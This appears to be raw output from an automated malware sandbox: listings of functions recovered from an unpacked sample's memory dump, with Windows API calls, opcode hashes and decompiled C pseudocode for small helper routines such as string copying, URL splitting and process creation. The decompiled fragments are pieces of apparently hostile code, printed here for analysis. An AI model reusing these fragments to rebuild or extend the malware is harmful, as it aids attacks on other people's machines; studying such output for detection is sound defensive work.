                              • String ID:
                              • API String ID: 4211439915-0
                              • Opcode ID: 6b42b3072594166759f8f7c7413e22dd314565e277cf27f2c2376e372e8440cb
                              • Instruction ID: 837699ed728a400169f854d35c4db5ffce3dc40b4f3af82df7471ebd5467eb23
                              • Opcode Fuzzy Hash: 6b42b3072594166759f8f7c7413e22dd314565e277cf27f2c2376e372e8440cb
                              • Instruction Fuzzy Hash: 66F06276640130ABF3711A69AE8DF9F7E55EB043A1F110525FA8AE71D4C63A4840C794
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,0103FD57,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 01033768
                              • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0103377D
                              • wsprintfA.USER32 ref: 01033799
                                • Part of subcall function 0104339E: memset.NTDLL ref: 010433B3
                                • Part of subcall function 0104339E: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000020,00000000), ref: 010433EC
                                • Part of subcall function 0104339E: wcstombs.NTDLL ref: 010433F6
                                • Part of subcall function 0104339E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000020,00000000), ref: 01043427
                                • Part of subcall function 0104339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 01043453
                                • Part of subcall function 0104339E: TerminateProcess.KERNEL32(?,000003E5), ref: 01043469
                                • Part of subcall function 0104339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 0104347D
                                • Part of subcall function 0104339E: CloseHandle.KERNEL32(?), ref: 010434B0
                                • Part of subcall function 0104339E: CloseHandle.KERNEL32(?), ref: 010434B5
                              • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 010337B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                              • String ID:
                              • API String ID: 1624158581-0
                              • Opcode ID: b305d346c55ed1d784777071b02ce95bfb6cf7db415d9feeea360dc9e5746843
                              • Instruction ID: a7d0dd3fa76383cb2feb71af2061617c161ee3db9c24f0e310eff1d273b5557c
                              • Opcode Fuzzy Hash: b305d346c55ed1d784777071b02ce95bfb6cf7db415d9feeea360dc9e5746843
                              • Instruction Fuzzy Hash: F1F0E9B9240210BBD331172DBD8CF5F7AADFFC1760F050121F981DB298CA698805C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 01039FD4
                              • Sleep.KERNEL32(0000000A,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 01039FDE
                              • HeapFree.KERNEL32(00000000,?,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0103A006
                              • RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 0103A024
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID:
                              • API String ID: 58946197-0
                              • Opcode ID: 2758e15189ade6d74ddca08376f62f36de4917d12980db73c745d47eb3b325f3
                              • Instruction ID: 17bc2601fab2b1b3f1f32f11a3fc1539689a7f4484174e23dbb55857acee0dbc
                              • Opcode Fuzzy Hash: 2758e15189ade6d74ddca08376f62f36de4917d12980db73c745d47eb3b325f3
                              • Instruction Fuzzy Hash: CCF034B5780342EFE7709F68DA88F0B7BA8EB40344B008404B5C6D72AAC63AE854CB15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E5C2B() {
                              				void* _t1;
                              				intOrPtr _t5;
                              				void* _t6;
                              				void* _t7;
                              				void* _t11;
                              
                              				_t1 =  *0x13ed2a4; // 0x2a0
                              				if(_t1 == 0) {
                              					L8:
                              					return 0;
                              				}
                              				SetEvent(_t1);
                              				_t11 = 0x7fffffff;
                              				while(1) {
                              					SleepEx(0x64, 1);
                              					_t5 =  *0x13ed2f4; // 0x0
                              					if(_t5 == 0) {
                              						break;
                              					}
                              					_t11 = _t11 - 0x64;
                              					if(_t11 > 0) {
                              						continue;
                              					}
                              					break;
                              				}
                              				_t6 =  *0x13ed2a4; // 0x2a0
                              				if(_t6 != 0) {
                              					CloseHandle(_t6);
                              				}
                              				_t7 =  *0x13ed270; // 0x36e0000
                              				if(_t7 != 0) {
                              					HeapDestroy(_t7);
                              				}
                              				goto L8;
                              			}
                              0x013e5c2b
                              0x013e5c32
                              0x013e5c7c
                              0x013e5c7e
                              0x013e5c7e
                              0x013e5c36
                              0x013e5c3c
                              0x013e5c41
                              0x013e5c45
                              0x013e5c4b
                              0x013e5c52
                              0x00000000
                              0x00000000
                              0x013e5c54
                              0x013e5c59
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e5c59
                              0x013e5c5b
                              0x013e5c63
                              0x013e5c66
                              0x013e5c66
                              0x013e5c6c
                              0x013e5c73
                              0x013e5c76
                              0x013e5c76
                              0x00000000

                              APIs
                              • SetEvent.KERNEL32(000002A0,00000001,013E4170), ref: 013E5C36
                              • SleepEx.KERNEL32(00000064,00000001), ref: 013E5C45
                              • CloseHandle.KERNEL32(000002A0), ref: 013E5C66
                              • HeapDestroy.KERNEL32(036E0000), ref: 013E5C76
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CloseDestroyEventHandleHeapSleep
                              • String ID:
                              • API String ID: 4109453060-0
                              • Opcode ID: 584c3fa1d81f64d6f47de341ef905466f03898c04d7de328f1ffc46b43a2cde3
                              • Instruction ID: c7ea89e0339d505502f571ca8e369618e4db297e67fe88bd0cbb02fdca769cea
                              • Opcode Fuzzy Hash: 584c3fa1d81f64d6f47de341ef905466f03898c04d7de328f1ffc46b43a2cde3
                              • Instruction Fuzzy Hash: C7F03775B013225FEF30AA78995CB0B3EECAB05769F040614FE15DF1C8CA20C9118760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 0103238E
                              • Sleep.KERNEL32(0000000A,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 01032398
                              • HeapFree.KERNEL32(00000000,?,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 010323C6
                              • RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 010323DB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID:
                              • API String ID: 58946197-0
                              • Opcode ID: e9aed6e3e07a5a3121fa5cb4054f011074e215e41171e516a1e130ab708090a3
                              • Instruction ID: 1ed33e618b6e533bbec8bce0c4b142c16a0b3854ba4106f26063e184aa11997e
                              • Opcode Fuzzy Hash: e9aed6e3e07a5a3121fa5cb4054f011074e215e41171e516a1e130ab708090a3
                              • Instruction Fuzzy Hash: 4AF0DAB8791302DBE7688F15DA89F1B77A9EB45701B04C045F9C297669C77EA840CB11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E3A79(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                              				struct _FILETIME _v12;
                              				void* _t11;
                              				void* _t20;
                              				void* _t22;
                              				void* _t23;
                              				signed short* _t24;
                              
                              				_t22 = __edx;
                              				_t23 = E013E65F6(_t11, _a12);
                              				if(_t23 == 0) {
                              					_t20 = 8;
                              				} else {
                              					_t24 = _t23 + _a16 * 2;
                              					 *_t24 =  *_t24 & 0x00000000;
                              					_t20 = E013E6B4F(__ecx, _a4, _a8, _t23);
                              					if(_t20 == 0) {
                              						GetSystemTimeAsFileTime( &_v12);
                              						 *_t24 = 0x5f;
                              						_t20 = E013E6E41(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                              					}
                              					HeapFree( *0x13ed270, 0, _t23);
                              				}
                              				return _t20;
                              			}
                              0x013e3a79
                              0x013e3a8a
                              0x013e3a8e
                              0x013e3ae7
                              0x013e3a90
                              0x013e3a97
                              0x013e3a9d
                              0x013e3aa6
                              0x013e3aaa
                              0x013e3ab0
                              0x013e3ac0
                              0x013e3ad2
                              0x013e3ad2
                              0x013e3add
                              0x013e3add
                              0x013e3aee

                              APIs
                                • Part of subcall function 013E65F6: lstrlen.KERNEL32(?,00000000,03AD9B78,00000000,013E25B8,03AD9D56,69B25F44,?,?,?,?,69B25F44,00000005,013ED00C,4D283A53,?), ref: 013E65FD
                                • Part of subcall function 013E65F6: mbstowcs.NTDLL ref: 013E6626
                                • Part of subcall function 013E65F6: memset.NTDLL ref: 013E6638
                              • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,03AD93AC), ref: 013E3AB0
                              • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,03AD93AC), ref: 013E3ADD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                              • String ID: Uxt
                              • API String ID: 1500278894-1536154274
                              • Opcode ID: 9fafbd4ef5e2189edec04ddd020fcf519bbb5c5fa21e9472c745604feff26230
                              • Instruction ID: 1d1b66f193cf14e50fe886bd85b8a4f7c8ab4be5b117045b1a9207e3d5a6ec8c
                              • Opcode Fuzzy Hash: 9fafbd4ef5e2189edec04ddd020fcf519bbb5c5fa21e9472c745604feff26230
                              • Instruction Fuzzy Hash: 17017C3260031ABBEB216F99DC49E9B7FBDFB84718F004025FA009A191EB71D854C750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(?,?,?), ref: 01032F4D
                              • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 01032F5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID: 0x
                              • API String ID: 3510742995-3225541890
                              • Opcode ID: aebcfc746ed98ee94c12a2585c4db682fc0b0473b6790204596a0a2fdd3b1632
                              • Instruction ID: cb487c133bf0dc1bd8cec83042e1d522cd16dc35a70222822620fed3fb143d1b
                              • Opcode Fuzzy Hash: aebcfc746ed98ee94c12a2585c4db682fc0b0473b6790204596a0a2fdd3b1632
                              • Instruction Fuzzy Hash: BE015E75A0010AAFDB01DAACC9459AEBBB9EB84244F004565E984E7140E7709A09C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0102423E
                              • CloseHandle.KERNEL32(?,?,00000100,?), ref: 0102428C
                              • HeapFree.KERNEL32(00000000,?,00000094,00000000,01029FB1,00000000,?,01041646,00000000,?,01032F93,00000000,?,0103FF7D,00000000,?), ref: 010244F0
                              • GetLastError.KERNEL32(?,?), ref: 010247F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseErrorFreeHandleHeapLastmemset
                              • String ID:
                              • API String ID: 2333114656-0
                              • Opcode ID: 9ecace4183b75d5359f13fa8bd924ece37ccf1b1bcd4493eb7ecc303ff71c779
                              • Instruction ID: 994eb28816de081eb5a4e7e3da79c49085028ede26791b1ef0ad603b2fe4e287
                              • Opcode Fuzzy Hash: 9ecace4183b75d5359f13fa8bd924ece37ccf1b1bcd4493eb7ecc303ff71c779
                              • Instruction Fuzzy Hash: BF510A7560422AFFEB21AF64DC80FEF7AACBB56700F004061FAE5D6080DB75C9558B22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01033D4D: lstrlen.KERNEL32(00000000,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033DA6
                                • Part of subcall function 01033D4D: lstrlen.KERNEL32(?,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033DC4
                                • Part of subcall function 01033D4D: RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 01033DED
                                • Part of subcall function 01033D4D: memcpy.NTDLL(00000000,00000000,00000000,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033E04
                                • Part of subcall function 01033D4D: HeapFree.KERNEL32(00000000,00000000), ref: 01033E17
                                • Part of subcall function 01033D4D: memcpy.NTDLL(00000000,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033E26
                              • GetLastError.KERNEL32 ref: 010294E8
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0102A2EC
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0102A310
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,00000000,?,00000000,010501F4,?,?,0102121E,?,00000000,?,?), ref: 0102A31E
                              • HeapFree.KERNEL32(00000000,?), ref: 01029504
                              • HeapFree.KERNEL32(00000000,?), ref: 01029515
                              • SetLastError.KERNEL32(00000000), ref: 01029518
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                              • String ID:
                              • API String ID: 2451549186-0
                              • Opcode ID: 708b4410c8bda05f85ea34eb6287c11563424273ea137173ef02470f6e588963
                              • Instruction ID: d8732443093d7f20931f66699a734be241f826ef5c0d3dba94765c365e57fa29
                              • Opcode Fuzzy Hash: 708b4410c8bda05f85ea34eb6287c11563424273ea137173ef02470f6e588963
                              • Instruction Fuzzy Hash: D8313836900229EFCF529FA9D9808DEBFB5FF44314F104156FA56A2124C7368A61DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0102570C: lstrlenW.KERNEL32(?), ref: 01025730
                                • Part of subcall function 0102570C: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01025742
                                • Part of subcall function 0102570C: wcstombs.NTDLL ref: 01025750
                                • Part of subcall function 0102570C: lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 01025774
                                • Part of subcall function 0102570C: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 01025789
                                • Part of subcall function 0102570C: mbstowcs.NTDLL ref: 01025796
                                • Part of subcall function 0102570C: HeapFree.KERNEL32(00000000,00000000), ref: 010257A8
                                • Part of subcall function 0102570C: HeapFree.KERNEL32(00000000,00000000,?,?), ref: 010257C2
                              • GetLastError.KERNEL32 ref: 0103ED33
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0102A2EC
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0102A310
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,00000000,?,00000000,010501F4,?,?,0102121E,?,00000000,?,?), ref: 0102A31E
                              • HeapFree.KERNEL32(00000000,?), ref: 0103ED4F
                              • HeapFree.KERNEL32(00000000,?), ref: 0103ED60
                              • SetLastError.KERNEL32(00000000), ref: 0103ED63
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 3867366388-0
                              • Opcode ID: 6f2412b2f5847f244d87aeca7415c57daf2b65b91cc68eff8b351f7a25dd7dbe
                              • Instruction ID: 4910aaa6b11bc9b589218010c9a259fedb26a9cc92aa813a1dd4f02426842165
                              • Opcode Fuzzy Hash: 6f2412b2f5847f244d87aeca7415c57daf2b65b91cc68eff8b351f7a25dd7dbe
                              • Instruction Fuzzy Hash: B6316736900219FFCF52AF99DD848DEBFB9FF84310B004296FA55A2120C3368A61DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 737eb687ca511fa961f2496be190838ce86df67e37f7c0bb2fc3b1ea4c0e27d3
                              • Instruction ID: 43252f5835a80a2c671a0a5c01c9430415aed13ba42eec97a5c49e1b7d97f9ab
                              • Opcode Fuzzy Hash: 737eb687ca511fa961f2496be190838ce86df67e37f7c0bb2fc3b1ea4c0e27d3
                              • Instruction Fuzzy Hash: 2C21D4B2500509BFEB605F94DD8096A7B7DFF093007440959EA85E6800D332F9B0CBD5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(747C81D0,00000008,?,00000000,?,?,01042B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520,?,?,0102329A), ref: 01038EB8
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                                • Part of subcall function 0104849C: StrChrA.SHLWAPI(?,0000002F,00000000,747C81D0,01038EE6,747C81D0,00000001,00000001,?,?,01042B07,747C81D0,747C81D0,00000000,00000008,0000EA60), ref: 010484AA
                                • Part of subcall function 0104849C: StrChrA.SHLWAPI(?,0000003F,?,?,01042B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520,?,?,0102329A,?,?), ref: 010484B4
                              • memcpy.NTDLL(00000000,747C81D0,747C81D0,747C81D0,00000001,00000001,?,?,01042B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520), ref: 01038F16
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 01038F26
                              • lstrcpy.KERNEL32(00000000,747C81D0), ref: 01038F32
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                              • String ID:
                              • API String ID: 3767559652-0
                              • Opcode ID: 9e90f2e9a2c1b56f9d93d71cd7497e59de6eb26c4e84b93efc0b6178832d04ad
                              • Instruction ID: 10f5793a57418b274de2f3843072be0e88bacb6ade99805b9448b9d83928daf8
                              • Opcode Fuzzy Hash: 9e90f2e9a2c1b56f9d93d71cd7497e59de6eb26c4e84b93efc0b6178832d04ad
                              • Instruction Fuzzy Hash: 0D21E7F6504215EFDB115F78C884AAF7FEDAF96280B058195FA859B202D735C90087A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 58%
                              			E013E282F(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                              				intOrPtr* _v8;
                              				void* _t17;
                              				intOrPtr* _t22;
                              				void* _t27;
                              				char* _t30;
                              				void* _t33;
                              				void* _t34;
                              				void* _t36;
                              				void* _t37;
                              				void* _t39;
                              				int _t42;
                              
                              				_t17 = __eax;
                              				_t37 = 0;
                              				__imp__(_a4, _t33, _t36, _t27, __ecx);
                              				_t2 = _t17 + 1; // 0x1
                              				_t28 = _t2;
                              				_t34 = E013E55DC(_t2);
                              				if(_t34 != 0) {
                              					_t30 = E013E55DC(_t28);
                              					if(_t30 == 0) {
                              						E013E6DFA(_t34);
                              					} else {
                              						_t39 = _a4;
                              						_t22 = E013EAAD2(_t39);
                              						_v8 = _t22;
                              						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                              							_a4 = _t39;
                              						} else {
                              							_t26 = _t22 + 2;
                              							_a4 = _t22 + 2;
                              							_t22 = E013EAAD2(_t26);
                              							_v8 = _t22;
                              						}
                              						if(_t22 == 0) {
                              							__imp__(_t34, _a4);
                              							 *_t30 = 0x2f;
                              							 *((char*)(_t30 + 1)) = 0;
                              						} else {
                              							_t42 = _t22 - _a4;
                              							memcpy(_t34, _a4, _t42);
                              							 *((char*)(_t34 + _t42)) = 0;
                              							__imp__(_t30, _v8);
                              						}
                              						 *_a8 = _t34;
                              						_t37 = 1;
                              						 *_a12 = _t30;
                              					}
                              				}
                              				return _t37;
                              			}

                              APIs
                              • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,013E56E4,00000000,00000000,?,03AD9618,?,?,013E3B91,?,03AD9618), ref: 013E283B
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                                • Part of subcall function 013EAAD2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,013E2869,00000000,00000001,00000001,?,?,013E56E4,00000000,00000000,?,03AD9618), ref: 013EAAE0
                                • Part of subcall function 013EAAD2: StrChrA.SHLWAPI(?,0000003F,?,?,013E56E4,00000000,00000000,?,03AD9618,?,?,013E3B91,?,03AD9618,0000EA60,?), ref: 013EAAEA
                              • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,013E56E4,00000000,00000000,?,03AD9618,?,?,013E3B91), ref: 013E2899
                              • lstrcpy.KERNEL32(00000000,?), ref: 013E28A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 013E28B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                              • String ID:
                              • API String ID: 3767559652-0
                              • Opcode ID: 2aafc9fcbd05f34d31d65ff3c72e4a907492587b8efe806d0a16b724640f01bd
                              • Instruction ID: 8606fb2290edd4423b7d7023d4cd141dc3c166b799e4fe8b99f20df56e0d0cda
                              • Opcode Fuzzy Hash: 2aafc9fcbd05f34d31d65ff3c72e4a907492587b8efe806d0a16b724640f01bd
                              • Instruction Fuzzy Hash: 6421907250032AEBDB129F68C848AAF7FEDEF56258F054054FD499B281D735C944C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 88606a831818490d4dc6dcba95992888581799010516fa77a7e37b89fcee84fd
                              • Instruction ID: 703a994e8e13cbe2e82045f7376ae87c9458985fa75c4f2bc6061495a64f5af6
                              • Opcode Fuzzy Hash: 88606a831818490d4dc6dcba95992888581799010516fa77a7e37b89fcee84fd
                              • Instruction Fuzzy Hash: 4611C1B250052AFFDB109FA1DC80E9ABB68FF08300B050A29F68851801D332B5B19BD5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E5434(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                              				void* _v8;
                              				void* _t18;
                              				int _t25;
                              				int _t29;
                              				int _t34;
                              
                              				_t29 = lstrlenW(_a4);
                              				_t25 = lstrlenW(_a8);
                              				_t18 = E013E55DC(_t25 + _t29 + _t25 + _t29 + 2);
                              				_v8 = _t18;
                              				if(_t18 != 0) {
                              					_t34 = _t29 + _t29;
                              					memcpy(_t18, _a4, _t34);
                              					_t10 = _t25 + 2; // 0x2
                              					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                              				}
                              				return _v8;
                              			}

                              APIs
                              • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,03AD93AC,?,013E4CD5,004F0053,03AD93AC,?,?,?,?,?,?,013E50D9), ref: 013E5444
                              • lstrlenW.KERNEL32(013E4CD5,?,013E4CD5,004F0053,03AD93AC,?,?,?,?,?,?,013E50D9), ref: 013E544B
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,013E4CD5,004F0053,03AD93AC,?,?,?,?,?,?,013E50D9), ref: 013E546B
                              • memcpy.NTDLL(747869A0,013E4CD5,00000002,00000000,004F0053,747869A0,?,?,013E4CD5,004F0053,03AD93AC), ref: 013E547E
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrlenmemcpy$AllocateHeap
                              • String ID:
                              • API String ID: 2411391700-0
                              • Opcode ID: 2d98f8a6fd4c17f0845e53b6ea2791998824af2bfa05b940ab610deeabf0a07a
                              • Instruction ID: e03992f04547bcad4e60c0a550472b064b7e7199d97b03b2cedeaff46ab3fb83
                              • Opcode Fuzzy Hash: 2d98f8a6fd4c17f0845e53b6ea2791998824af2bfa05b940ab610deeabf0a07a
                              • Instruction Fuzzy Hash: 58F03C36900229FBCB10EFA9CC48CDE7BECEF092587114062E904D7141E735EA108BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(69B25F44,?,?,00000000,0103069E,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 0103952F
                              • lstrlen.KERNEL32(?,?,?,00000000,0103069E,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 01039534
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,0103069E,00000000,?,?,00000000,69B25F44,?,?,?), ref: 01039550
                              • lstrcpy.KERNEL32(00000000,?), ref: 0103956E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                              • String ID:
                              • API String ID: 1697500751-0
                              • Opcode ID: 0ba67b05a7ef06509a1967b8600f885df69830e5567bc044c418b233e038e6c5
                              • Instruction ID: e8cb39f03d0f543ed0931971a3273dbeb27718043b0e44e49f0f24e8050ad2a7
                              • Opcode Fuzzy Hash: 0ba67b05a7ef06509a1967b8600f885df69830e5567bc044c418b233e038e6c5
                              • Instruction Fuzzy Hash: C3F022BA500701ABE3219AAD9C48E5BBF9CAFC4311B450555FAC183105D335C4008BB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(04B3BFB8,00000000,00000000,74785520,0103F2A8,00000000), ref: 01033EB2
                              • lstrlen.KERNEL32(?), ref: 01033EBA
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpy.KERNEL32(00000000,04B3BFB8), ref: 01033ECE
                              • lstrcat.KERNEL32(00000000,?), ref: 01033ED9
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                              • String ID:
                              • API String ID: 74227042-0
                              • Opcode ID: 8be140e0a82febe8cd25cd6ccff238edc4253a90186a12d328d9ba16e4562906
                              • Instruction ID: 327b295187c0da3058df843554890c8d917ef1807cc6128063bd50047dbe19db
                              • Opcode Fuzzy Hash: 8be140e0a82febe8cd25cd6ccff238edc4253a90186a12d328d9ba16e4562906
                              • Instruction Fuzzy Hash: 84E01B776016259B87215FE8AC88C5FBBACFFD9751304441AF681D7108C739981587A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(03AD9B58,00000000,00000000,?,013E6507,00000000), ref: 013E6F7D
                              • lstrlen.KERNEL32(?), ref: 013E6F85
